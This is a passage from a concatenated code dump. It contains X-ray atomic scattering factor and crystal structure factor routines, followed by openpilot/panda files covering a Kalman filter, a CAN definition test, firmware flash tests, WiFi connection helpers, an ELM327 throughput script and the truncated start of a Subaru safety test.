listed, just get it, no fit f0coeffs[sym+f'%+g'%charge] = f01[1] continue #do fitting here f0_1 = get_f0_from_f0coeff(f0, qq) f0_2 = get_f0_from_f0coeff(f01[1], qq) f00 = f0_1 + charge / f01[0] * (f0_2 - f0_1) p0 = f0 #neutral f0 for p0 #if 2nd atom with valence closer to charge, use it instead of neutral atom if abs(charge-f01[0]) < abs(charge): p0 = f01[1] f00_fit, pcov_fit = curve_fit(func, qq, f00, p0=p0) f0coeffs[sym+f'%+g'%charge] = f00_fit return f0coeffs if __name__ == "__main__": from srxraylib.plot.gol import plot, set_qt #from scipy.optimize import curve_fit set_qt() filename = "f0_InterTables.dat" coeffs_B = get_f0_coeffs_from_dabax_file(entry_name="B", filename=filename) # # f0 data # q = numpy.array([0,0.05,0.1,0.15,0.2,0.25,0.3,0.35,0.4,0.5,0.6,0.7,0.8,0.9,1,1.1,1.2,1.3,1.4,1.5,1.6,1.7,1.8,1.9]) f0_B = get_f0_from_f0coeff(coeffs_B, q) f0_B3plus = numpy.array([2,1.995,1.979,1.954,1.919,1.875,1.824,1.766,1.703,1.566,1.42,1.274,1.132,0.999,0.877,0.767,0.669,0.582,0.507,0.441,0.384,0.335,0.293,0.256]) f0_Bdot = f0_B + (-0.0455) / 3 * (f0_B3plus - f0_B) # # fit # #def func(q, a1, a2, a3, a4, a5, a6, a7, a8, a9): # return get_f0_from_f0coeff([a1, a2, a3, a4, a5, a6, a7, a8, a9], q) popt_B3plus, pcov_B3plus = curve_fit(func, q, f0_B3plus, p0=coeffs_B) print("fitted B3+: ", popt_B3plus) popt_Bdot, pcov_Bdot = curve_fit(func, q, f0_Bdot, p0=coeffs_B) print("fitted Bdot: ", popt_Bdot) # # plot # from srxraylib.plot.gol import plot coeff_Bdot = numpy.array([]) plot(q, f0_B3plus, q, get_f0_from_f0coeff(popt_B3plus, q), xtitle=r"q (sin $\theta$ / $\lambda$)", ytitle="f0 [electron units]", legend=["B3plus original", "B3plus from srio fit"], title=filename) coeff_Bdot = numpy.array([0.858,0.89669,1.0756,2.118,0.095903,0.46461,1.2126,61.273,23.55]) plot(q, f0_Bdot, q, get_f0_from_f0coeff(coeff_Bdot, q), q, get_f0_from_f0coeff(popt_Bdot, q), xtitle=r"q (sin $\theta$ / $\lambda$)", ytitle="f0 [electron units]", legend=["Bdot original", "Bdot from Xiaojiang fit","Bdot from srio fit",], title=filename) print("fitted Bdot Xiaojiang: ", coeff_Bdot) print("fitted Bdot srio: ", popt_Bdot) # # add this block to f0_InterTables.dat # print("\n#S 5 B3+\n#N 9\n#L a1 a2 a3 a4 c b1 b2 b3 b4\n"+"%g "*9 % (tuple(popt_Bdot))) # # test remote B3+ # try: import os os.remove("f0_InterTables.dat") except: pass filename = "f0_InterTables.dat" coeffs_B3plus_remote = get_f0_coeffs_from_dabax_file(entry_name="B3+", filename=filename) coeff_Bdot = numpy.array([]) plot(q, f0_B3plus, q, get_f0_from_f0coeff(popt_B3plus, q), xtitle=r"q (sin $\theta$ / $\lambda$)", ytitle="f0 [electron units]", legend=["B3plus original", "B3plus from remote f0_InterTables.dat"], title=filename) ``` #### File: discussion/widget/xoppy_xraylib_util2.py ```python import xraylib import numpy import os import scipy.constants as codata # <NAME>, <EMAIL> from orangecontrib.xoppy.util.temperature_anisotropy import TemperFactor #from orangecontrib.xoppy.util.xoppy_xraylib_util import f0_xop from orangecontrib.xoppy.util.Crystal_Atnum import Crystal_Atnum from orangecontrib.xoppy.util.Crystal_Parser import Crystal_Parser from orangecontrib.xoppy.util.Crystal_Parser import SymbolToAtomicNumber import re #------------------------------------------------------------------------- toangstroms = codata.h * codata.c / codata.e * 1e10 def f0_xop(Z,AtomicName=None): tmp = { '5':[ 2.11021585, 0.94826030, 1.03175074, 0.17991800, 0.72039282, 0.00538888, 21.36228681, 1.17425000, 65.42872639, 0.12888999, 0.44259026], '14':[ 4.98816795, 3.35710271, 1.50292204, 1.22172882, 2.76143663, 0.15142442, 2.53600438, 29.97580504, 0.08254945, 88.73513838, 1.16712390], '36':[17.53267157, 7.44816522, 267.89934293, 2.98742575, 6.61999042, -266.63403399, 1.82191497, 15.41761348, 0.00002029, 39.30642110, 0.14476941], 'B-.':[1.493, 1.0472, 0.7776, 0.64929, 1.0233, 0.050981, 21.37, 65.436, 0.36215, 21.354, 1.1387], 'Y3+':[6.3697, 10.29, 4.3719, 5.9527, 4.3852, 4.6028, 1.28, 13.169, 0.41449, 1.967, 1.2664] } # tmp = numpy.array(tmp) # return tmp[Z-1].copy() if Z > 0: return tmp[str(Z)].copy() if AtomicName not in tmp: raise Exception('hmmm?') return tmp[AtomicName].copy() #should contain a atomic string name def bragg_calc2(descriptor="YB66",hh=1,kk=1,ll=1,temper=1.0,emin=5000.0,emax=15000.0,estep=100.0,ANISO_SEL=0,fileout=None): """ Preprocessor for Structure Factor (FH) calculations. It calculates the basic ingredients of FH. :param descriptor: crystal name (as in xraylib) :param hh: miller index H :param kk: miller index K :param ll: miller index L :param temper: temperature factor (scalar <=1.0 ) :param emin: photon energy minimum :param emax: photon energy maximum :param estep: photon energy step :param fileout: name for the output file (default=None, no output file) :return: a dictionary with all ingredients of the structure factor. """ output_dictionary = {} codata_e2_mc2 = codata.e**2 / codata.m_e / codata.c**2 / (4*numpy.pi*codata.epsilon_0) # in m # f = open(fileout,'w') txt = "" txt += "# Bragg version, Data file type\n" txt += "2.4 1\n" #cryst = xraylib.Crystal_GetCrystal('YB66') cryst = Crystal_Parser(filename=descriptor) volume = cryst['volume'] #test crystal data - not needed itest = 0 if itest: print (" Unit cell dimensions are %f %f %f" % (cryst['a'],cryst['b'],cryst['c'])) print (" Unit cell angles are %f %f %f" % (cryst['alpha'],cryst['beta'],cryst['gamma'])) print (" Unit cell volume is %f A^3" % volume ) print (" Atoms at:") print (" Z fraction X Y Z") for i in range(cryst['n_atom']): atom = cryst['atom'][i] print (" %3i %f %f %f %f" % (atom['Zatom'], atom['fraction'], atom['x'], atom['y'], atom['z']) ) print (" ") #dspacing = xraylib.Crystal_dSpacing(cryst, hh, kk, ll) alpha = cryst['alpha'] * numpy.pi/180 beta = cryst['beta'] * numpy.pi/180 gamma = cryst['gamma'] * numpy.pi/180 dspacing = (volume / (cryst['a'] * cryst['b'] * cryst['c'])) * numpy.sqrt(1 / ( \ (hh * numpy.sin(alpha) / cryst['a'])**2 + (kk * numpy.sin(beta) / cryst['b'])**2 + \ (ll * numpy.sin(gamma) / cryst['c'])**2 + \ 2 * hh * kk * (numpy.cos(alpha) * numpy.cos(beta) - numpy.cos(gamma)) / (cryst['a'] * cryst['b']) + \ 2 * hh * ll * (numpy.cos(alpha) * numpy.cos(gamma) - numpy.cos(beta)) / (cryst['a'] * cryst['c']) + \ 2 * kk * ll * (numpy.cos(beta) * numpy.cos(gamma) - numpy.cos(alpha)) / (cryst['b'] * cryst['c']))) dspacing *= 1e-8 # in cm volume = volume*1e-8*1e-8*1e-8 # in cm^3 rn = (1e0/volume)*(codata_e2_mc2*1e2) txt += "# RN = (e^2/(m c^2))/V) [cm^-2], d spacing [cm]\n" txt += "%e %e \n" % (rn , dspacing) output_dictionary["rn"] = rn output_dictionary["dspacing"] = dspacing atom = cryst['atom'] list_Zatom = [ atom[i]['Zatom'] for i in range(len(atom))] list_fraction = [ atom[i]['fraction'] for i in range(len(atom))] list_x = [ atom[i]['x'] for i in range(len(atom))] list_y = [ atom[i]['y'] for i in range(len(atom))] list_z = [ atom[i]['z'] for i in range(len(atom))] unique_Zatom = set(list_Zatom) ## ------------ XJ.YU Singapore Synchrotorn Light Source -------------------------- ## For backward compatible if 'AtomicName' not in atom[0].keys(): cryst['Aniso']=[{'start':0}] for i in range(len(atom)): atom[i]['AtomicName']='' list_AtomicName = [ atom[i]['AtomicName'] for i in range(len(atom))] unique_AtomicName = list(sorted(set(list_AtomicName))) #unique_AtomicName has at least one empty string if unique_AtomicName[0] !='': #now unique_Zatom is changed from set to list, allow duplicate atomic number #because same atom at different sites may have different valences, i.e., O2-,O1.5- unique_Zatom=[] for z in unique_AtomicName: tmp = re.search('(^[a-zA-Z]*)',z) unique_Zatom.append(SymbolToAtomicNumber(tmp.group(0))) ## ------------ Singapore Synchrotorn Light Source --------------------------------- TmpCrystal = () # for diff_pat.exe if unique_AtomicName[0] !='': #Complex crystal TmpCrystal = Crystal_Atnum(list_AtomicName, unique_AtomicName, unique_Zatom,list_fraction) nbatom = (len(TmpCrystal[0])) else: nbatom = (len(unique_Zatom)) txt += "# Number of different element-sites in unit cell NBATOM:\n%d \n" % nbatom nbatom = (len(unique_Zatom)) #keep old nbatom output_dictionary["nbatom"] = nbatom txt += "# for each element-site, the atomic number\n" if unique_AtomicName[0] !='': #Complex crystal for i in TmpCrystal[0]: i = int(i + 0.5) #round to integer value, diff_pat not support float txt += "%d "%i else: #normal crystals for i in unique_Zatom: txt += "%d "%i txt += "\n" if len(TmpCrystal) > 0: output_dictionary["atnum"] = list(TmpCrystal[0]) else: output_dictionary["atnum"] = list(unique_Zatom) #XJ.YU Singapore Synchrotorn Light Source output_dictionary["zcol"] = list(list_Zatom) output_dictionary["unique_AtomicName"] = list(unique_AtomicName) output_dictionary["list_AtomicName"] = list(list_AtomicName) #TODO: manage correctly fraction, the ones in non-representative atoms are ignored. txt += "# for each element-site, the occupation factor\n" unique_fraction = [] if len(TmpCrystal) == 0: #normal crystal for i in range(len(unique_Zatom)): # #commenut out By XJ.YU, <EMAIL> # always 1, not handle by diff_pat.exe # unique_fraction.append(list_fraction[i]) unique_fraction.append(1) txt += "%g "%(unique_fraction[i]) else: for z in TmpCrystal[1]: #fractional unique_fraction.append(z) txt += "%g "%(z) txt += "\n" # coment out by XJ.YU # output_dictionary["fraction"] = unique_fraction # # because even for same kind atom in different sites could have different occupancy,Like YB66, B1,B2,etc # so keep the original fraction list # output_dictionary["fraction"] = list_fraction #not unique_fraction, full list txt += "# for each element-site, the temperature factor\n" # temperature parameter list_temper = [] if len(TmpCrystal) > 0: #complex crystal for i in TmpCrystal[1]: txt += "%5.3f "%temper #for diff_pat.exe for i in range(len(unique_Zatom)): list_temper.append(temper) txt += "\n" output_dictionary["temper"] = list_temper #not necessary same with diff_pat # # Geometrical part of structure factor: G and G_BAR # txt += "# for each type of element-site, COOR_NR=G_0\n" list_multiplicity = [] #when there are duplicate atomic numbers in unique_Zatom, it is not correct anymore #should use unique_AtomicName, and list_AtomicName instead # commnent out: <NAME>, <EMAIL> if unique_AtomicName[0] =='': for z in unique_Zatom: txt += "%d "%list_Zatom.count(z) list_multiplicity.append(list_Zatom.count(z)) else: for z in unique_AtomicName: # txt += "%d "%list_AtomicName.count(z) list_multiplicity.append(list_AtomicName.count(z)) for z in TmpCrystal[2]: txt += "%d "%z txt += "\n" output_dictionary["G_0"] = list_multiplicity # # Consider anisotropic temperature factor # <NAME>, <EMAIL> # A dummy dictionary Aniso with start =0 if no aniso temperature factor input # start if cryst['Aniso'][0]['start']>0: TFac = TemperFactor( 1.0/(2.0*dspacing*1e8),cryst['Aniso'],Miller={'h':hh,'k':kk,'l':ll}, \ cell={'a':cryst['a'],'b':cryst['b'],'c':cryst['c']},n=len(atom)) B_TFac = 1 else: B_TFac = 0 # end # txt += "# for each type of element-site, G and G_BAR (both complex)\n" list_g = [] list_g_bar = [] tmp_g={} #add for diff_pat.exe, multiple different sites with same atom for z in unique_Zatom: ga = 0.0 + 0j for i,zz in enumerate(list_Zatom): # comment out by <NAME> # add multiplied by occupancy and temperature factor # if zz == z: # ga += numpy.exp(2j*numpy.pi*(hh*list_x[i]+kk*list_y[i]+ll*list_z[i])) if zz == z: if B_TFac: TCoff = TFac[ANISO_SEL,i] else: TCoff = 1 ga += numpy.exp(2j*numpy.pi*(hh*list_x[i]+kk*list_y[i]+ll*list_z[i]))*list_fraction[i]*TCoff if len(TmpCrystal) == 0: #normal crystal txt += "(%g,%g) \n"%(ga.real,ga.imag) txt += "(%g,%g) \n"%(ga.real,-ga.imag) else: #temporay save here tmp_g[str(z)] = [(ga.real,ga.imag),(ga.real,-ga.imag)] list_g.append(ga) list_g_bar.append(ga.conjugate()) if len(TmpCrystal) > 0: #for diff_pat.exe for z in TmpCrystal[3]: #receive the G for atom at each site txt += "(%g,%g) \n"%tmp_g[str(z)][0] txt += "(%g,%g) \n"%tmp_g[str(z)][1] output_dictionary["G"] = list_g output_dictionary["G_BAR"] = list_g_bar # # F0 part # txt += "# for each type of element-site, the number of f0 coefficients followed by them\n" list_f0 = [] tmp_g={} #add for diff_pat.exe, multiple different sites with same atom for i,zeta in enumerate(unique_Zatom): #Comment: <NAME>, <EMAIL> #For complicate compound crystal, we use unique_AtomicName instead of atomic number to get f0 # if unique_AtomicName[0] !='': #with compound name input tmp1 = re.search('(^[a-zA-Z]*)',unique_AtomicName[i]) if tmp1.group(0) == unique_AtomicName[i]: #AtomicName only, without valence info (i.e., B, Y, O) tmp = f0_xop(zeta) else: tmp = f0_xop(0,AtomicName=unique_AtomicName[i]) else: tmp = f0_xop(zeta) # print(("%g "*11)%(tmp.tolist())) if len(TmpCrystal) == 0: #normal crystal txt += ("11 "+"%g "*11+"\n")%(tuple(tmp)) else: #temporaty save here tmp_g[str(zeta)] = tuple(tmp) # By XJ.Yu, return value already changed from array to list #list_f0.append(tmp.tolist()) list_f0.append(tmp) if len(TmpCrystal) > 0: #for diff_pat.exe for zeta in TmpCrystal[3]: #receive the f0 for atom at each site txt += ("11 "+"%g "*11+"\n")%(tmp_g[str(zeta)]) output_dictionary["f0coeff"] = list_f0 # f.write("# -----------------------------------------------\n") # zetas = numpy.array([atom[0]["Zatom"],atom[7]["Zatom"]]) # <NAME>, use ceil to round up, otherwise we may get actual max energy less than emax npoint = int(numpy.ceil(( (emax - emin)/estep + 1 ))) txt += "# The number of energy points NPOINT: \n" txt += ("%i \n") % npoint output_dictionary["npoint"] = npoint txt += "# for each energy point, energy, F1(1),F2(1),...,F1(nbatom),F2(nbatom)\n" list_energy = [] if len(TmpCrystal) > 0: #for diff_pat.exe tmp_len = len(TmpCrystal[3]) else: tmp_len = len(unique_Zatom) out_f1 = numpy.zeros( (tmp_len,npoint), dtype=float) out_f2 = numpy.zeros( (tmp_len,npoint), dtype=float) out_fcompton = numpy.zeros( (tmp_len,npoint), dtype=complex) for i in range(npoint): energy = (emin+estep*i) txt += ("%20.11e \n") % (energy) list_energy.append(energy) if len(TmpCrystal) > 0: #for diff_pat.exe tmp_g = TmpCrystal[3] else: tmp_g = unique_Zatom # for j,zeta in enumerate(unique_Zatom): for j,zeta in enumerate(tmp_g): f1a = xraylib.Fi(int(zeta),energy*1e-3) f2a = -xraylib.Fii(int(zeta),energy*1e-3) # TODO: check the sign!! txt += (" %20.11e %20.11e 1.000 \n")%(f1a, f2a) out_f1[j,i] = f1a out_f2[j,i] = f2a out_fcompton[j,i] = 1.0 output_dictionary["energy"] = list_energy output_dictionary["f1"] = out_f1 output_dictionary["f2"] = out_f2 output_dictionary["fcompton"] = out_fcompton if fileout != None: with open(fileout,"w") as f: f.write(txt) print("File written to disk: %s" % fileout) return output_dictionary def crystal_fh2(input_dictionary,phot_in,theta=None,forceratio=0): """ :param input_dictionary: as resulting from bragg_calc() :param phot_in: photon energy in eV :param theta: incident angle (half of scattering angle) in rad :return: a dictionary with structure factor """ # outfil = input_dictionary["outfil"] # fract = input_dictionary["fract"] rn = input_dictionary["rn"] dspacing = numpy.array(input_dictionary["dspacing"]) nbatom = numpy.array(input_dictionary["nbatom"]) atnum = numpy.array(input_dictionary["atnum"]) temper = numpy.array(input_dictionary["temper"]) G_0 = numpy.array(input_dictionary["G_0"]) G = numpy.array(input_dictionary["G"]) G_BAR = numpy.array(input_dictionary["G_BAR"]) f0coeff = numpy.array(input_dictionary["f0coeff"]) npoint = numpy.array(input_dictionary["npoint"]) energy = numpy.array(input_dictionary["energy"]) fp = numpy.array(input_dictionary["f1"]) fpp = numpy.array(input_dictionary["f2"]) #<NAME>, <EMAIL> ZCOL = numpy.array(input_dictionary["zcol"]) FCOL = numpy.array(input_dictionary["fraction"]) UCOL = numpy.array(input_dictionary["unique_AtomicName"]) LCOL = numpy.array(input_dictionary["list_AtomicName"]) #--------------------------------------------------------- phot_in = numpy.array(phot_in,dtype=float).reshape(-1) toangstroms = codata.h * codata.c / codata.e * 1e10 itheta = numpy.zeros_like(phot_in) for i,phot in enumerate(phot_in): if theta is None: itheta[i] = numpy.arcsin(toangstroms*1e-8/phot/2/dspacing) else: itheta[i] = theta # print("energy= %g eV, theta = %15.13g deg"%(phot,itheta[i]*180/numpy.pi)) if phot < energy[0] or phot > energy[-1]: raise Exception("Photon energy %g eV outside of valid limits [%g,%g]"%(phot,energy[0],energy[-1])) if forceratio == 0: ratio = numpy.sin(itheta[i]) / (toangstroms / phot) else: ratio = 1 / (2 * dspacing * 1e8) # print("Ratio: ",ratio) F0 = numpy.zeros(nbatom) #<NAME>, <EMAIL> F000 = numpy.zeros(nbatom) for j in range(nbatom): icentral = int(f0coeff.shape[1]/2) F0[j] = f0coeff[j,icentral] F000[j] = F0[j] #<NAME>, <EMAIL> for i in range(icentral): F0[j] += f0coeff[j,i] * numpy.exp(-1.0*f0coeff[j,i+icentral+1]*ratio**2) F000[j] += f0coeff[j,i] #actual number of electrons carried by each atom, <NAME>, <EMAIL> # print("F0: ",F0,xraylib.FF_Rayl(int(atnum[j]),ratio)) # ;C # ;C Interpolate for the atomic scattering factor. # ;C for j,ienergy in enumerate(energy): if ienergy > phot: break nener = j - 1 F1 = numpy.zeros(nbatom,dtype=float) F2 = numpy.zeros(nbatom,dtype=float) F = numpy.zeros(nbatom,dtype=complex) for j in range(nbatom): F1[j] = fp[j,nener] + (fp[j,nener+1] - fp[j,nener]) * \ (phot - energy[nener]) / (energy[nener+1] - energy[nener]) F2[j] = fpp[j,nener] + (fpp[j,nener+1] - fpp[j,nener]) * \ (phot - energy[nener]) / (energy[nener+1] - energy[nener]) # print("F1,F2",F1,F2) r_lam0 = toangstroms * 1e-8 / phot for j in range(nbatom): F[j] = F0[j] + F1[j] + 1j * F2[j] # print("F",F) F_0 = 0.0 + 0.0j FH = 0.0 + 0.0j FH_BAR = 0.0 + 0.0j FHr = 0.0 + 0.0j FHi = 0.0 + 0.0j FH_BARr = 0.0 + 0.0j FH_BARi = 0.0 + 0.0j CI = 0.0 + 1.0j TEMPER_AVE = 1.0 #<NAME>, <EMAIL> #Occupancy for FH already included in G in Bragg_Calc function BOOL_UCOL = UCOL[0]=='' for j in range(nbatom): FH += G[j] * F[j] * 1.0 FHr += G[j] * (F0[j] + F1[j])* 1.0 FHi += G[j] * F2[j] * 1.0 #charged atom, the number of electrons not equal to atum anymore,while # it is euqal to F000, and notably, fractial occupancy need consideration here # occupancy till now, only consider in calculation of G, and G_BAR in bragg_calc #comment out: <NAME>, <EMAIL> # # F_0 += G_0[j] * ( atnum[j] + F1[j] + 1j * F2[j] ) * 1.0 # FN = F000[j] + F1[j] + CI * F2[j] if BOOL_UCOL: #normal crystal F_0 += FN*numpy.sum( numpy.where(ZCOL==atnum[j],FCOL,0.0)) else: #complicate compound crystals F_0 += FN*numpy.sum( numpy.where(LCOL==UCOL[j],FCOL,0.0)) TEMPER_AVE *= (temper[j])**(G_0[j]/(G_0.sum())) FH_BAR += (G_BAR[j] * F[j] * 1.0) FH_BARr += (G_BAR[j] * (F0[j] + F1[j]) *1.0) FH_BARi += (G_BAR[j] * F2[j] * 1.0) # print("TEMPER_AVE: ",TEMPER_AVE) # ;C # ;C multiply by the average temperature factor # ;C FH *= TEMPER_AVE FHr *= TEMPER_AVE FHi *= TEMPER_AVE FH_BAR *= TEMPER_AVE FH_BARr *= TEMPER_AVE FH_BARi *= TEMPER_AVE STRUCT = numpy.sqrt(FH * FH_BAR) # ;C # ;C PSI_CONJ = F*( note: PSI_HBAR is PSI at -H position and is # ;C proportional to fh_bar but PSI_CONJ is complex conjugate os PSI_H) # ;C psi_over_f = rn * r_lam0**2 / numpy.pi psi_h = rn * r_lam0**2 / numpy.pi * FH psi_hr = rn * r_lam0**2 / numpy.pi * FHr psi_hi = rn * r_lam0**2 / numpy.pi * FHi psi_hbar = rn * r_lam0**2 / numpy.pi * FH_BAR psi_hbarr = rn * r_lam0**2 / numpy.pi * FH_BARr psi_hbari = rn * r_lam0**2 / numpy.pi * FH_BARi psi_0 = rn * r_lam0**2 / numpy.pi * F_0 psi_conj = rn * r_lam0**2 / numpy.pi * FH.conjugate() # ; # ; Darwin width # ; # print(rn,r_lam0,STRUCT,itheta) ssvar = rn * (r_lam0**2) * STRUCT / numpy.pi / numpy.sin(2.0*itheta) spvar = ssvar * numpy.abs((numpy.cos(2.0*itheta))) ssr = ssvar.real spr = spvar.real # ;C # ;C computes refractive index. # ;C ([3.171] of Zachariasen's book) # ;C REFRAC = (1.0+0j) - r_lam0**2 * rn * F_0 / 2/ numpy.pi DELTA_REF = 1.0 - REFRAC.real ABSORP = 4.0 * numpy.pi * (-REFRAC.imag) / r_lam0 THETA_B =r_lam0/(1-(DELTA_REF/numpy.sin(itheta)**2))/2.0/dspacing THETA_B = numpy.arcsin(THETA_B) txt = "" txt += '\n******************************************************' txt += '\n at energy = '+repr(phot)+' eV' txt += '\n = '+repr(r_lam0*1e8)+' Angstroms' txt += '\n and at angle = '+repr(itheta*180.0/numpy.pi)+' degrees' txt += '\n = '+repr(itheta)+' rads' txt += '\n******************************************************' for j in range(nbatom): txt += '\n ' txt += '\nFor atom '+repr(j+1)+':' txt += '\n fo + fp+ i fpp = ' txt += '\n '+repr(F0[j])+' + '+ repr(F1[j].real)+' + i'+ repr(F2[j])+" =" txt += '\n '+repr(F0[j] + F1[j] + 1j * F2[j]) txt += '\n Z = '+repr(atnum[j]) txt += '\n Temperature factor = '+repr(temper[j]) txt += '\n ' txt += '\n Structure factor F(0,0,0) = '+repr(F_0) txt += '\n Structure factor FH = ' +repr(FH) txt += '\n Structure factor FH_BAR = ' +repr(FH_BAR) txt += '\n Structure factor F(h,k,l) = '+repr(STRUCT) txt += '\n ' txt += '\n Psi_0 = ' +repr(psi_0) txt += '\n Psi_H = ' +repr(psi_h) txt += '\n Psi_HBar = '+repr(psi_hbar) txt += '\n ' txt += '\n Psi_H(real) Real and Imaginary parts = ' + repr(psi_hr) txt += '\n Psi_H(real) Modulus = ' + repr(numpy.abs(psi_hr)) txt += '\n Psi_H(imag) Real and Imaginary parts = ' + repr(psi_hi) txt += '\n Psi_H(imag) Modulus = ' + repr(abs(psi_hi)) txt += '\n Psi_HBar(real) Real and Imaginary parts = '+ repr(psi_hbarr) txt += '\n Psi_HBar(real) Modulus = ' + repr(abs(psi_hbarr)) txt += '\n Psi_HBar(imag) Real and Imaginary parts = '+ repr(psi_hbari) txt += '\n Psi_HBar(imag) Modulus = ' + repr(abs(psi_hbari)) txt += '\n ' txt += '\n Psi/F factor = ' + repr(psi_over_f) txt += '\n ' txt += '\n Average Temperature factor = ' + repr(TEMPER_AVE) txt += '\n Refraction index = 1 - delta - i*beta' txt += '\n delta = ' + repr(DELTA_REF) txt += '\n beta = ' + repr(1.0e0*REFRAC.imag) txt += '\n Absorption coeff = ' + repr(ABSORP)+' cm^-1' txt += '\n ' txt += '\n e^2/(mc^2)/V = ' + repr(rn)+' cm^-2' txt += '\n d-spacing = ' + repr(dspacing*1.0e8)+' Angstroms' txt += '\n SIN(theta)/Lambda = ' + repr(ratio) txt += '\n ' txt += '\n Darwin width for symmetric s-pol [microrad] = ' + repr(2.0e6*ssr) txt += '\n Darwin width for symmetric p-pol [microrad] = ' + repr(2.0e6*spr) return {"PHOT":phot, "WAVELENGTH":r_lam0*1e-2 ,"THETA":itheta,"THETAcor":THETA_B, "F_0":F_0, "FH":FH, "FH_BAR":FH_BAR, "STRUCT":STRUCT, "psi_0":psi_0, "psi_h":psi_h, "psi_hbar":psi_hbar, "DELTA_REF":DELTA_REF, "REFRAC":REFRAC, "ABSORP":ABSORP, "RATIO":ratio, "ssr":ssr, "spr":spr, "psi_over_f":psi_over_f, "info":txt} ```
{ "source": "919bot/Tessa", "score": 3 }
#### File: common/kalman/simple_kalman_old.py ```python import numpy as np class KF1D: # this EKF assumes constant covariance matrix, so calculations are much simpler # the Kalman gain also needs to be precomputed using the control module def __init__(self, x0, A, C, K): self.x = x0 self.A = A self.C = C self.K = K self.A_K = self.A - np.dot(self.K, self.C) # K matrix needs to be pre-computed as follow: # import control # (x, l, K) = control.dare(np.transpose(self.A), np.transpose(self.C), Q, R) # self.K = np.transpose(K) def update(self, meas): self.x = np.dot(self.A_K, self.x) + np.dot(self.K, meas) return self.x ``` #### File: can/tests/test_define.py ```python import unittest from opendbc.can.can_define import CANDefine class TestCADNDefine(unittest.TestCase): def test_civic(self): dbc_file = "honda_civic_touring_2016_can_generated" defs = CANDefine(dbc_file) self.assertDictEqual(defs.dv[399], defs.dv['STEER_STATUS']) self.assertDictEqual(defs.dv[399], {'STEER_STATUS': {6: 'TMP_FAULT', 5: 'FAULT_1', 4: 'NO_TORQUE_ALERT_2', 3: 'LOW_SPEED_LOCKOUT', 2: 'NO_TORQUE_ALERT_1', 0: 'NORMAL'} } ) if __name__ == "__main__": unittest.main() ``` #### File: tests/automated/0_builds.py ```python from panda import build_st def test_build_panda(): build_st("obj/panda.bin") def test_build_bootstub_panda(): build_st("obj/bootstub.panda.bin") ``` #### File: tests/automated/1_program.py ```python import os from nose.tools import assert_equal from panda import Panda, BASEDIR from .helpers import reset_pandas, test_all_pandas, panda_connect_and_init # Reset the pandas before flashing them def aaaa_reset_before_tests(): reset_pandas() @test_all_pandas @panda_connect_and_init def test_recover(p): assert p.recover(timeout=30) @test_all_pandas @panda_connect_and_init def test_flash(p): p.flash() @test_all_pandas @panda_connect_and_init def test_get_signature(p): fn = os.path.join(BASEDIR, "board/obj/panda.bin") firmware_sig = Panda.get_signature_from_firmware(fn) panda_sig = p.get_signature() assert_equal(panda_sig, firmware_sig) ``` #### File: tests/automated/wifi_helpers.py ```python import os import sys import time import subprocess import requests from panda import Panda FNULL = open(os.devnull, 'w') def _connect_wifi(dongle_id, pw, insecure_okay=False): ssid = "panda-" + dongle_id r = subprocess.call(["ping", "-W", "4", "-c", "1", "192.168.0.10"], stdout=FNULL, stderr=subprocess.STDOUT) if not r: # Can already ping, try connecting on wifi try: p = Panda("WIFI") p.get_serial() print("Already connected") return except: pass print("WIFI: connecting to %s" % ssid) while 1: if sys.platform == "darwin": os.system("networksetup -setairportnetwork en0 %s %s" % (ssid, pw)) else: wlan_interface = subprocess.check_output(["sh", "-c", "iw dev | awk '/Interface/ {print $2}'"]).strip().decode('utf8') cnt = 0 MAX_TRIES = 10 while cnt < MAX_TRIES: print("WIFI: scanning %d" % cnt) os.system("iwlist %s scanning > /dev/null" % wlan_interface) os.system("nmcli device wifi rescan") wifi_networks = [x.decode("utf8") for x in subprocess.check_output(["nmcli","dev", "wifi", "list"]).split(b"\n")] wifi_scan = [x for x in wifi_networks if ssid in x] if len(wifi_scan) != 0: break time.sleep(0.1) # MAX_TRIES tries, ~10 seconds max cnt += 1 assert cnt < MAX_TRIES if "-pair" in wifi_scan[0]: os.system("nmcli d wifi connect %s-pair" % (ssid)) connect_cnt = 0 MAX_TRIES = 100 while connect_cnt < MAX_TRIES: connect_cnt += 1 r = subprocess.call(["ping", "-W", "4", "-c", "1", "192.168.0.10"], stdout=FNULL, stderr=subprocess.STDOUT) if r: print("Waiting for panda to ping...") time.sleep(0.5) else: break if insecure_okay: break # fetch webpage print("connecting to insecure network to secure") try: r = requests.get("http://192.168.0.10/") except requests.ConnectionError: r = requests.get("http://192.168.0.10/") assert r.status_code==200 print("securing") try: r = requests.get("http://192.168.0.10/secure", timeout=0.01) except requests.exceptions.Timeout: print("timeout http request to secure") pass else: ret = os.system("nmcli d wifi connect %s password %s" % (ssid, pw)) if os.WEXITSTATUS(ret) == 0: #check ping too ping_ok = False connect_cnt = 0 MAX_TRIES = 10 while connect_cnt < MAX_TRIES: connect_cnt += 1 r = subprocess.call(["ping", "-W", "4", "-c", "1", "192.168.0.10"], stdout=FNULL, stderr=subprocess.STDOUT) if r: print("Waiting for panda to ping...") time.sleep(0.1) else: ping_ok = True break if ping_ok: break # TODO: confirm that it's connected to the right panda ``` #### File: panda/tests/elm_throughput.py ```python import socket import threading import select class Reader(threading.Thread): def __init__(self, s, *args, **kwargs): super(Reader, self).__init__(*args, **kwargs) self._s = s self.__stop = False def stop(self): self.__stop = True def run(self): while not self.__stop: s.recv(1000) def read_or_fail(s): ready = select.select([s], [], [], 4) assert ready[0], "Socket did not receive data within the timeout duration." return s.recv(1000) def send_msg(s, msg): s.send(msg) res = b'' while not res.endswith(">"): res += read_or_fail(s) return res if __name__ == "__main__": s = socket.create_connection(("192.168.0.10", 35000)) #t1 = Reader(s) #t1.start() send_msg(s, b"ATZ\r") send_msg(s, b"ATL1\r") print(send_msg(s, b"ATE0\r")) print(send_msg(s, b"ATS0\r")) print(send_msg(s, b"ATSP6\r")) print("\nLOOP\n") while True: print(send_msg(s, b"0100\r")) print(send_msg(s, b"010d\r")) ``` #### File: tests/safety/test_subaru.py ```python import unittest import numpy as np from panda import Panda from panda.tests.safety import libpandasafety_py from panda.tests.safety.common import test_relay_malfunction, make_msg, test_manually_enable_controls_allowed, test_spam_can_buses MAX_RATE_UP = 50 MAX_RATE_DOWN = 70 MAX_STEER = 2047 MAX_RT_DELTA = 940 RT_INTERVAL = 250000 DRIVER_TORQUE_ALLOWANCE = 60; DRIVER_TORQUE_FACTOR = 10; TX_MSGS = [[0x122, 0], [0x164, 0], [0x221, 0], [0x322, 0]] def twos_comp(val, bits): if val >= 0: return val else: return (2**bits) + val def sign(a): if a > 0: return 1 else: return -1 class 